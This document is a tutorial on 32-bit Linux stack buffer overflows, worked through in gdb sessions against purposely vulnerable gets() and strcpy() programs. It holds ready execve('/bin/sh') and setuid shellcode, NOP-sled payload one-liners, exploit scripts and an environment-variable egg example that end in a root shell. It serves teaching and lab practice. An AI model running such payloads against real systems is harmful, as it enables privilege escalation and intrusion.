Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
(gdb) run
Starting program: /root/TEST_AREA/bufferoverflow/program/sample1
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Program received signal SIGSEGV, Segmentation fault.
0x33634132 in ?? ()
Crashing at 0x33634132. Find the offset:
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 33634132
[*] Exact match at offset 68
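If Metasploit isn’t at hand, the idea behind the two tools is easy to reproduce. The following is a rough Python sketch of a cyclic upper/lower/digit pattern and the matching offset lookup; it is not Metasploit’s implementation, the function names merely mirror the scripts, and a 32-bit little-endian EIP is assumed.

```python
import string
import struct

def pattern_create(length):
    """Build a non-repeating pattern of triplets: Aa0Aa1...Aa9Ab0Ab1..."""
    triplets = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                if len(triplets) * 3 >= length:
                    return "".join(triplets)[:length]
                triplets.append(upper + lower + digit)
    return "".join(triplets)[:length]

def pattern_offset(eip_value, length=8192):
    """Locate the 4 bytes that ended up in EIP inside the pattern (-1 if absent)."""
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)

print(pattern_create(100))
print(pattern_offset(0x33634132))  # 68, the same offset pattern_offset.rb reported
```

The value 0x33634132 corresponds to the bytes “2Ac3” in memory, and their position in the pattern is the number of bytes needed before RET.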
Disassemble:
(gdb) disas main
Dump of assembler code for function main:
   0x00001199 <+0>:     push   %ebp
   0x0000119a <+1>:     mov    %esp,%ebp
   0x0000119c <+3>:     sub    $0x40,%esp
   0x0000119f <+6>:     lea    -0x40(%ebp),%eax
   0x000011a2 <+9>:     push   %eax
   0x000011a3 <+10>:    call   0x11a4
   0x000011a8 <+15>:    add    $0x4,%esp
   0x000011ab <+18>:    mov    $0x0,%eax
   0x000011b0 <+23>:    leave
   0x000011b1 <+24>:    ret
End of assembler dump.
Set a breakpoint on leave (0x000011b0):
(gdb) break *0x000011b0
Breakpoint 1 at 0x11b0: file sample1.c, line 11.
(gdb) run
Starting program: /home/cyberpunk/buffer_overflow/sample1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(gdb) info frame
Stack level 0, frame at 0xbffff300:
 eip = 0x4011b0 in main (sample1.c:11); saved eip = 0xb7dfa7e1
 source language c.
 Arglist at 0xbffff2f8, args: argc=1, argv=0xbffff394
 Locals at 0xbffff2f8, Previous frame's sp is 0xbffff300
 Saved registers:
  ebp at 0xbffff2f8, eip at 0xbffff2fc
(gdb) x/24wx $esp
0xbffff2b8:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff2c8:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff2d8:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff2e8:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff2f8:     0x00414141      0xb7dfa7e1      0x00000001      0xbffff394
0xbffff308:     0xbffff39c      0xbffff324      0x00000001      0x00000000
Measuring the distance between the buffer start and the saved EIP gives us the offset to RET, i.e. the buffer size (64) plus the saved EBP (4):
0xbffff2fc - 0xbffff2b8 = 0x44 (decimal: 68)
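The same subtraction as a quick Python check, using the two addresses reported by gdb (buffer start at ESP, saved EIP from info frame). The 64 + 4 split assumes the frame holds only the buffer and the saved EBP, as the disassembly of main suggests.

```python
buffer_start = 0xbffff2b8   # $esp at the breakpoint, where the A's begin
saved_eip_at = 0xbffff2fc   # "eip at" from info frame

offset_to_ret = saved_eip_at - buffer_start
print(hex(offset_to_ret), offset_to_ret)

BUFFER_SIZE = 64
SAVED_EBP_SIZE = 4
```

Both routes, the pattern lookup and the address arithmetic, agree on the amount of padding needed before RET.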
Find some shellcode that executes/calls some shell (/bin/sh):
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
gets() buffer overflow [py struct]
We’re trying to generate the following order of things on stack:
---------------
PAD PAD PAD PAD
PAD PAD PAD PAD     buffer [64]
PAD PAD PAD PAD
---------------
PAD PAD             EBP
RET     ------
NOP NOP NOP NOP      |
NOP NOP NOP NOP <------
NOP NOP NOP NOP
SHL SHL SHL SHL
SHL SHL SHL SHL
You can decide to place everything within the buffer (if it fits), move things around or try different variations, but the general idea, as always, is to overwrite EBP/RET and reach the shellcode. Start with this script/exploit (sample1.py):
import struct

pad = "\x41" * 68
RET = "ABCD"
shellcode = "AAAA"
NOP = "\x90" * 16
print pad + RET + NOP + shellcode
Instead of 64 we set the padding to 68, overwriting the saved EBP as well (+4 bytes). To check that RET lands in the right place we left RET=ABCD (0x44434241):
(gdb) run <<< $(python sample1.py)
Starting program: /home/cyberpunk/sample1 <<< $(python sample1.py)
/bin/bash: warning: command substitution: ignored null byte in input
Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()
(gdb) x/24xw $esp
0xbffff710:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff720:     0x99580b6a      0x2d686652      0x68e78963      0x6868732f
0xbffff730:     0x6e69622f      0xe852e389      0x69622f08      0x68732f6e
0xbffff740:     0xe1895357      0x000080cd      0x00000000      0x00000000
0xbffff750:     0x00000000      0x080db000      0x080db000      0x080db000
0xbffff760:     0x00000000      0x99ef2a7c      0x6f44cb13      0x00000000
As expected, the order of things is exactly right. We can also see the address of the NOPs to which we should jump (0xbffff710). Go ahead and correct sample1.py, replacing ABCD with 0xbffff710. Instead of dealing with the endianness by hand, use “struct.pack”, which sets the byte order appropriately: RET = struct.pack("I", 0xbffff710).
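For reference, this is what struct.pack produces for that address. The sketch uses Python 3 byte strings (the article’s scripts are Python 2) and the explicit "<I" format, which forces little-endian regardless of the machine running the script; plain "I" uses the native byte order, which happens to be the same on x86.

```python
import struct

ret = struct.pack("<I", 0xbffff710)   # 32-bit unsigned, little-endian
print(ret)

# Unpacking gives the original address back
assert struct.unpack("<I", ret)[0] == 0xbffff710
```

The least significant byte comes first, which is exactly the order the CPU expects to find on the stack.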
Ok, before we turn to the gets() buffer overflow ShellCode, we should probably mention a number of issues you might experience.
The first one, and we’ll place a note on this as well, is the situation in which the ShellCode exits before we reach a shell, the “exited normally”:
(gdb) run <<< $(python sample1.py)
Starting program: /home/cyberpunk/sample1 <<< $(python sample1.py)
process 21393 is executing new program: /usr/bin/dash
[Inferior 1 (process 21393) exited normally]
or via terminal:
$ python sample1.py | sample1
$
After the exploit is executed, stdin is already at end-of-file, so the shell exits immediately and nothing happens. No shell access. We need to find a way to keep stdin open, and one frequently mentioned approach is leaving cat open:
$ (python sample1.py;cat)|./sample1
whoami
root
The second one is the ShellCode not executing as the owner. The SUID(0) thing might not work even if you set chmod u+s <executable>. There were suggestions to add setuid(0) explicitly (does work, but not realistic), to check /proc/mounts and move the file to a path not mounted with nosuid, etc., but almost none mention that the exploit / ShellCode itself should be handling this.
For example, you might use a plain execve(/bin/sh) ShellCode that works fine with strcpy():
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       50                      push   %eax
 8048063:       68 2f 2f 73 68          push   $0x68732f2f
 8048068:       68 2f 62 69 6e          push   $0x6e69622f
 804806d:       89 e3                   mov    %esp,%ebx
 804806f:       89 c1                   mov    %eax,%ecx
 8048071:       89 c2                   mov    %eax,%edx
 8048073:       b0 0b                   mov    $0xb,%al
 8048075:       cd 80                   int    $0x80
 8048077:       31 c0                   xor    %eax,%eax
 8048079:       40                      inc    %eax
 804807a:       cd 80                   int    $0x80
shellcode = ""
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89"
shellcode += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
shellcode += "\xcd\x80\x31\xc0\x40\xcd\x80"
but you’ll end up with no root access with gets():
$ (python sample1.py;cat)|./sample1
whoami
cyberpunk
So, you must keep in mind the ShellCode type/operations, adjusting/changing them based on a situation at hand. The one below sets UID before calling a shell (30 bytes, exploit-db):
 8049380:       6a 17                   push   $0x17
 8049382:       58                      pop    %eax
 8049383:       31 db                   xor    %ebx,%ebx
 8049385:       cd 80                   int    $0x80
execve("/bin//sh", ["/bin//sh"], NULL)
 8049387:       6a 0b                   push   $0xb
 8049389:       58                      pop    %eax
 804938a:       99                      cltd
 804938b:       52                      push   %edx
 804938c:       68 2f 2f 73 68          push   $0x68732f2f
 8049391:       68 2f 62 69 6e          push   $0x6e69622f
 8049396:       89 e3                   mov    %esp,%ebx
 8049398:       52                      push   %edx
 8049399:       53                      push   %ebx
 804939a:       89 e1                   mov    %esp,%ecx
 804939c:       cd 80                   int    $0x80
shellcode="\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
$ (python sample1.py;cat) | ./sample1
whoami
root
These were probably worth mentioning as we frequently get questions on those specific issues. We most likely didn’t even scratch the surface of the issues you’ll be experiencing, but explore, improvise, and don’t get stuck in one place too long wondering if you’re crazy. Reorganize the elements, shift, double check, change the ShellCode, change the user, the system, etc. An insane idea/thought might not seem so irrational once everything starts working, so try everything.
Buffer overflow attack: Example II
The strcpy() is maybe a bit easier to conquer but here we’ll do things a bit differently maybe:
#include <string.h>
#include <stdio.h>

void func(char *name)
{
    char buf[100];
    strcpy(buf, name);
    printf("Text: %s\n", buf);
}

int main(int argc, char *argv[])
{
    func(argv[1]);
    return 0;
}
Disassembling the function:
(gdb) disas func
Dump of assembler code for function func:
0x000011a9 <+0>: push %ebp
0x000011aa <+1>: mov %esp,%ebp
0x000011ac <+3>: sub $0x64,%esp
0x000011af <+6>: pushl 0x8(%ebp)
0x000011b2 <+9>: lea -0x64(%ebp),%eax
0x000011b5 <+12>: push %eax
0x000011b6 <+13>: call 0x11b7
0x000011bb <+18>: add $0x8,%esp
0x000011be <+21>: lea -0x64(%ebp),%eax
0x000011c1 <+24>: push %eax
0x000011c2 <+25>: push $0x2008
0x000011c7 <+30>: call 0x11c8
0x000011cc <+35>: add $0x8,%esp
0x000011cf <+38>: nop
0x000011d0 <+39>: leave
0x000011d1 <+40>: ret
End of assembler dump.
The 0x64 is allocating 100 bytes for the buffer. The stack structure:
HIGH
|----------------| ------------ func start
|      name      | 8 (%EBP)
|----------------|
|      RET       | 4 (%EBP)
|----------------|
|      EBP       | --> points to previous / main's frame (%EBP)
|----------------|
|     buffer     | -4 (%EBP) => 100 bytes
|                |
|----------------| ------------ func end (ESP)
LOW
Ok, so in order to overwrite the RET we need buffer (100 bytes) + EBP (4 bytes) + RET (4 bytes):
(gdb) run $(python -c 'print "\x41" * 100 + "\x42\x42\x42\x42" + "\x43\x43\x43\x43"')
Starting program: /root/TEST_AREA/bufferoverflow/program/sample2 $(python -c 'print "\x41" * 100 + "\x42\x42\x42\x42" + "\x43\x43\x43\x43"')
Text: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
The segmentation fault at 0x43434343 indicates that we have successfully overwritten RET. Since nothing is mapped at 0x43434343, the process ends up with SIGSEGV. Check the stack and registers:
(gdb) x/50x $sp-150
0xbffff1ee: 0x3d80b7e2 0x2008b7fb 0xf2140040 0x0000bfff
0xbffff1fe: 0x00000000 0x00000000 0xc9850000 0x11ccb7e2
0xbffff20e: 0x20080040 0xf2180040 0x4141bfff 0x41414141
0xbffff21e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff22e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff23e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff24e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff25e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff26e: 0x41414141 0x41414141 0x41414141 0x42424141
0xbffff27e: 0x43434242 0xf4004343 0x0000bfff 0xa7e10000
0xbffff28e: 0x0002b7df 0xf3240000 0xf330bfff 0xf2b4bfff
0xbffff29e: 0x0001bfff 0x00000000 0x30000000 0x0000b7fb
0xbffff2ae: 0xf0000000 0x0000b7ff
(gdb) i r
eax            0x73        115
ecx            0x7fffff8d  2147483533
edx            0xb7fb5010  -1208266736
ebx            0x0         0
esp            0xbffff284  0xbffff284
ebp            0x42424242  0x42424242
esi            0xb7fb3000  -1208274944
edi            0xb7fb3000  -1208274944
eip            0x43434343  0x43434343
eflags         0x10286     [ PF SF IF RF ]
cs             0x73        115
ss             0x7b        123
ds             0x7b        123
es             0x7b        123
fs             0x0         0
gs             0x33        51
As expected EBP = 0x42424242 , EIP = 0x43434343.
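The offsets can be double-checked with a short script. The following is only a minimal Python 3 sketch (the one-liners in this article use the Python 2 print statement); names such as BUF_SIZE and pattern are ours and purely illustrative:

```python
# Sketch: rebuild the 108-byte test pattern and check which bytes
# end up over saved EBP and RET (layout taken from the stack diagram).
BUF_SIZE = 100   # char buf[100]  ->  sub $0x64,%esp
WORD = 4         # size of saved EBP / RET on 32-bit x86

pattern = b"\x41" * BUF_SIZE + b"\x42" * WORD + b"\x43" * WORD

ebp_off = BUF_SIZE          # saved EBP starts right after the buffer
ret_off = BUF_SIZE + WORD   # RET follows saved EBP

saved_ebp = int.from_bytes(pattern[ebp_off:ebp_off + WORD], "little")
ret = int.from_bytes(pattern[ret_off:ret_off + WORD], "little")

print(len(pattern), hex(saved_ebp), hex(ret))
# 108 0x42424242 0x43434343
```

The values match what gdb reports in EBP and EIP after the crash.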
ShellCode
We have already shown a few ways to generate or write a shellcode, but here we’ll go through another way of building it. There are also widely available lists of ready-made shellcodes and sources you can use.
xor eax, eax      ; Clearing eax register
push eax          ; Pushing NULL bytes
push 0x68732f2f   ; Pushing //sh
push 0x6e69622f   ; Pushing /bin
mov ebx, esp      ; ebx now has address of /bin//sh
push eax          ; Pushing NULL byte
mov edx, esp      ; edx now has address of NULL byte
push ebx          ; Pushing address of /bin//sh
mov ecx, esp      ; ecx now has address of address
                  ; of /bin//sh byte
mov al, 11        ; syscall number of execve is 11
int 0x80          ; Make the system call
Push the code into shellcode.asm and assemble it:
$ nasm -f elf shellcode.asm
Dump the resulting object file (ELF) and extract the shellcode:
$ objdump -d -M intel shellcode.o

shellcode.o: file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0: 31 c0             xor eax,eax
   2: 50                push eax
   3: 68 2f 2f 73 68    push 0x68732f2f
   8: 68 2f 62 69 6e    push 0x6e69622f
   d: 89 e3             mov ebx,esp
   f: 50                push eax
  10: 89 e2             mov edx,esp
  12: 53                push ebx
  13: 89 e1             mov ecx,esp
  15: b0 0b             mov al,0xb
  17: cd 80             int 0x80

$ for i in $(objdump -D shellcode.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
We’ve ended up with our shellcode (25 bytes):
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
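Since strcpy() stops copying at the first NULL byte, it’s worth confirming the size and checking for 0x00 bytes before building a payload. A minimal Python 3 sketch, where the helper name bad_bytes is our own and not part of any tool:

```python
# Sketch: sanity-check the extracted shellcode before using it in a payload.
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)

def bad_bytes(code, forbidden=b"\x00"):
    """Return the offsets of bytes that would cut a strcpy() copy short."""
    return [i for i, b in enumerate(code) if b in forbidden]

print(len(shellcode))        # 25
print(bad_bytes(shellcode))  # []
```

An empty list means the whole shellcode survives the copy; any offset listed would mark the point where strcpy() stops.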
NOP Sled & Execution
NOP (no-operation) is essentially an empty step: when the CPU hits such an instruction, it simply moves on to the next one.
Stack randomization can make buffer overflow exploitation difficult because it’s hard to predict where the jump will land. The idea is to place a large block of NOPs in front of the shellcode: the NOP area is harder to miss, even if the address shifts a little. If RET lands anywhere in the NOP area, the CPU executes the empty operations until it reaches our shellcode (basically sliding into it).
...\x90 \x90 \x90 \x90 \x90 | \x31 \xc0 \x50 \x68 \x2f ...
         NOP Sled           |        SHELLCODE
Our space of operation is 108 bytes (BUFFER + EBP + RET). The payload looks like this: NOP (79 bytes) + SHELLCODE (25 bytes) + RET (4 bytes, an address inside the NOP block).
(gdb) run $(python -c 'print "\x90" * 79 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x43\x43\x43\x43"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/TEST_AREA/bufferoverflow/program/sample2 $(python -c 'print "\x90" * 79 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x43\x43\x43\x43"')
Text: �������������������������������������������������������������������������������1�Ph//shh/bin��P��S�� CCCC

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) x/50x $sp-150
0xbffff1ee: 0x3d80b7e2 0x2008b7fb 0xf2140040 0x0000bfff
0xbffff1fe: 0x00000000 0x00000000 0xc9850000 0x11ccb7e2
0xbffff20e: 0x20080040 0xf2180040 0x9090bfff 0x90909090
0xbffff21e: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff22e: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff23e: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff24e: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff25e: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xbffff26e: 0x622f6868 0xe3896e69 0x53e28950 0x0bb0e189
0xbffff27e: 0x434380cd 0xf4004343
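We target an address inside the NOP block, e.g. 0xbffff21e. Keeping the little-endian byte order in mind, it becomes \x1e\xf2\xff\xbf. The NOP sled is shortened to 63 bytes so that the address can be repeated five times at the end of the payload: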
(gdb) run $(python -c 'print "\x90" * 63 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5')
Starting program: /root/TEST_AREA/bufferoverflow/program/sample2 $(python -c 'print "\x90" * 63 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5')
Text: ���������������������������������������������������������������1�Ph//shh/bin��P��S�� ���������������
process 16737 is executing new program: /usr/bin/dash
# whoami
[Detaching after fork from child process 16742]
cyberpunk
# exit
[Inferior 1 (process 16737) exited normally]
(gdb) quit
$ ./sample2 $(python -c 'print ...')
or
$ ./sample2 `python -c 'print "\x90" * 63 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5'`
Text: �����������������������������������������������������j1X1�̀�É�jFX̀� Rhn/shh//bi���̀N���N���N���N���
# whoami
root
# exit
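To avoid reversing the address bytes by hand, the return address can be packed with Python’s struct module. This is a minimal Python 3 sketch of the same payload as above; the variable names are ours, and the target address is the one from our gdb session, so it will differ on your system:

```python
import struct

NOP = b"\x90"
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
target = 0xbffff21e              # address inside the NOP sled (from gdb)

ret = struct.pack("<I", target)  # "<I" = 32-bit unsigned, little-endian
payload = NOP * 63 + shellcode + ret * 5

print(ret)           # b'\x1e\xf2\xff\xbf'
print(len(payload))  # 108
```

With 63 + 25 = 88 bytes in front, the fifth copy of the address occupies offsets 104 to 107, exactly where RET sits.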
There are numerous shellcodes out there, with various sizes and actions but the same purpose:
21 bytes:
----------------------------------------
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f ;; hs//
push 0x6e69622f ;; nib/
mov ebx, esp
mov al, 11
int 0x80

(gdb) run $(python -c 'print "\x90" * 67 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5')

23 bytes:
----------------------------------------
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

xor %eax,%eax
push %eax
push $0x68732f2f
push $0x6e69622f
mov %esp,%ebx
push %eax
push %ebx
mov %esp,%ecx
mov $0xb,%al
int $0x80

(gdb) run $(python -c 'print "\x90" * 65 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5')

28 bytes:
----------------------------------------
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80

(gdb) run $(python -c 'print "\x90" * 60 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x1e\xf2\xff\xbf" * 5')
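The NOP counts in these runs (67, 65, 60) simply fill whatever space is left in the 108 bytes. A minimal Python 3 sketch of that arithmetic, with a helper name (sled_length) of our own choosing:

```python
TOTAL = 108      # buffer (100) + saved EBP (4) + RET (4)
RET_COPIES = 5   # the return address is repeated five times in our payloads
WORD = 4         # size of one 32-bit address

def sled_length(shellcode_len, total=TOTAL, ret_copies=RET_COPIES):
    """Number of NOP bytes left once shellcode and addresses are placed."""
    n = total - shellcode_len - ret_copies * WORD
    if n < 0:
        raise ValueError("shellcode does not fit into the available space")
    return n

for size in (21, 23, 25, 28):
    print(size, sled_length(size))
# 21 67
# 23 65
# 25 63
# 28 60
```

A shellcode longer than 88 bytes would not fit this layout at all, which is why the helper raises an error in that case.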
Examples : HackYou & ExploitMe
The following two examples are frequently mentioned online, and we also think they’re good examples to check out.
HackYou.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// shellcode ripped from http://www.milw0rm.com/shellcode/444
char shellcode[]=
    "\x31\xc0"                 // xorl %eax,%eax
    "\x50"                     // pushl %eax
    "\x68\x6e\x2f\x73\x68"     // pushl $0x68732f6e
    "\x68\x2f\x2f\x62\x69"     // pushl $0x69622f2f
    "\x89\xe3"                 // movl %esp,%ebx
    "\x99"                     // cltd
    "\x52"                     // pushl %edx
    "\x53"                     // pushl %ebx
    "\x89\xe1"                 // movl %esp,%ecx
    "\xb0\x0b"                 // movb $0xb,%al
    "\xcd\x80"                 // int $0x80
;

char retaddr[] = "\xaa\xaa\xaa\xaa";

#define NOP 0x90

int main()
{
    char buffer[96];

    memset(buffer, NOP, 96);                     // fill everything with NOPs
    memcpy(buffer, "EGG=", 4);                   // variable name
    memcpy(buffer+4, shellcode, 24);             // 24-byte shellcode
    memcpy(buffer+88, retaddr, 4);               // 4-byte return address
    memcpy(buffer+92, "\x00\x00\x00\x00", 4);    // terminate the string
    putenv(buffer);
    system("/bin/sh");
    return 0;
}
So, what does all this do? The HackYou buffer is first filled with NOPs (0x90). Then “EGG=” is placed at the beginning of the buffer, followed in order by the ShellCode, the remaining NOP padding, RET and a terminating NULL. Note that only the 4 address bytes of retaddr are copied; copying more would read past retaddr and write past the end of buffer.
ExploitMe.c
#include<stdio.h>
#include<string.h>

int main(int argc, char **argv)
{
    char buffer[80];
    strcpy(buffer, argv[1]);
    return 1;
}
Structure:
HackYou:
HIGH
      |----------------| ------------ f1 start
      |      EGG       |  4
      |----------------|
      |   ShellCode    | 24 <--------------------------
      |----------------|                               |
      |                | 60                            |
      |                |                               |
      |                |                               |
      |----------------|                               |
      |      PTR       |  4 --------------------------
      |----------------|
      |      NULL      |  4
      |----------------| ------------ f1 end
LOW

ExploitMe:
HIGH
      |----------------| ------------ f1 start
      |     buffer     | 80 bytes => buffer
      |                |
      |                |
      |                |
      |----------------|
      |      EBP       |  4
      |----------------|
      |      RET       |  4
      |----------------| ------------ f1 end
LOW
The idea is for ExploitMe to execute the HackYou ShellCode stored in the EGG environment variable. Let’s check it out.
$ gcc -ggdb -fno-pic -z execstack -mpreferred-stack-boundary=2 -o HackYou HackYou.c
$ gcc -ggdb -fno-pic -z execstack -mpreferred-stack-boundary=2 -o ExploitMe ExploitMe.c
$ ./HackYou
# echo $EGG
1�Phn/shh//bi��RS�� ��������������������������������������������������������������
# gdb ExploitMe
(gdb) break main
Breakpoint 1 at 0x4011aa: file ExploitMe.c, line 7.
(gdb) break 8
Breakpoint 2 at 0x4011b4: file ExploitMe.c, line 8.
(gdb) run $EGG
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/TEST_AREA/bufferoverflow/program/ExploitMe $EGG

Breakpoint 1, main (argc=2, argv=0xbffff274) at ExploitMe.c:7
7 strcpy(buffer, argv[1]);
(gdb) disas main
Dump of assembler code for function main:
   0x00401199 <+0>: push %ebp
   0x0040119a <+1>: mov %esp,%ebp
   0x0040119c <+3>: sub $0x50,%esp
=> 0x0040119f <+6>: mov 0xc(%ebp),%eax
   0x004011a2 <+9>: add $0x4,%eax
   0x004011a5 <+12>: mov (%eax),%eax
   0x004011a7 <+14>: push %eax
   0x004011a8 <+15>: lea -0x50(%ebp),%eax
   0x004011ab <+18>: push %eax
   0x004011ac <+19>: call 0xb7e6e700 <__strcpy_sse2>
   0x004011b1 <+24>: add $0x8,%esp
   0x004011b4 <+27>: mov $0x1,%eax
   0x004011b9 <+32>: leave
   0x004011ba <+33>: ret
End of assembler dump.
With ExploitMe having 88 bytes (Buffer + EBP + RET), let’s see the content:
(gdb) x/22xw $esp
0xbffff188: 0xb7ffe840 0xb7fb6d08 0xb7fe62d0 0xb7fb3000
0xbffff198: 0x00000000 0xb7e119eb 0xb7fb33fc 0x00000001
0xbffff1a8: 0x00404000 0x0040120b 0x00000002 0xbffff274
0xbffff1b8: 0xbffff280 0x004011dd 0xb7fe62d0 0x00000000
0xbffff1c8: 0x00000000 0x00000000 0xb7fb3000 0xb7fb3000
0xbffff1d8: 0x00000000 0xb7dfa7e1
The 0xb7dfa7e1 is RET. To confirm it, disassemble it:
(gdb) disas 0xb7dfa7e1
Dump of assembler code for function __libc_start_main:
   0xb7dfa6f0 <+0>: call 0xb7f14a69 <__x86.get_pc_thunk.ax>
   0xb7dfa6f5 <+5>: add $0x1b890b,%eax
   0xb7dfa6fa <+10>: push %ebp
   0xb7dfa6fb <+11>: xor %edx,%edx
Now check the ShellCode in memory (HackYou, EGG):
(gdb) x/22xw argv[1]
0xbffff437: 0x6850c031 0x68732f6e 0x622f2f68 0x99e38969
0xbffff447: 0xe1895352 0x80cd0bb0 0x90909090 0x90909090
0xbffff457: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff467: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff477: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff487: 0x90909090 0xaaaaaaaa
strcpy overwrites the buffer (the top of the stack) with argv[1], i.e. our ShellCode:
(gdb) c
Continuing.

Breakpoint 2, main (argc=0, argv=0xbffff274) at ExploitMe.c:8
8 return 1;
(gdb) x/22xw $esp
0xbffff188: 0x6850c031 0x68732f6e 0x622f2f68 0x99e38969
0xbffff198: 0xe1895352 0x80cd0bb0 0x90909090 0x90909090
0xbffff1a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1d8: 0x90909090 0xaaaaaaaa
If we continue, we’re going to hit SIGSEGV (segmentation fault), as 0xaaaaaaaa is not a valid address. We need to point it to the beginning of our ShellCode, in this case 0xbffff188. Change retaddr[] in HackYou.c to “\x88\xf1\xff\xbf” and recompile. If we now check the situation:
(gdb) x/22xw $esp
0xbffff188: 0x6850c031 0x68732f6e 0x622f2f68 0x99e38969
0xbffff198: 0xe1895352 0x80cd0bb0 0x90909090 0x90909090
0xbffff1a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1d8: 0x90909090 0xbffff188
(gdb) c
Continuing.
process 9316 is executing new program: /usr/bin/dash
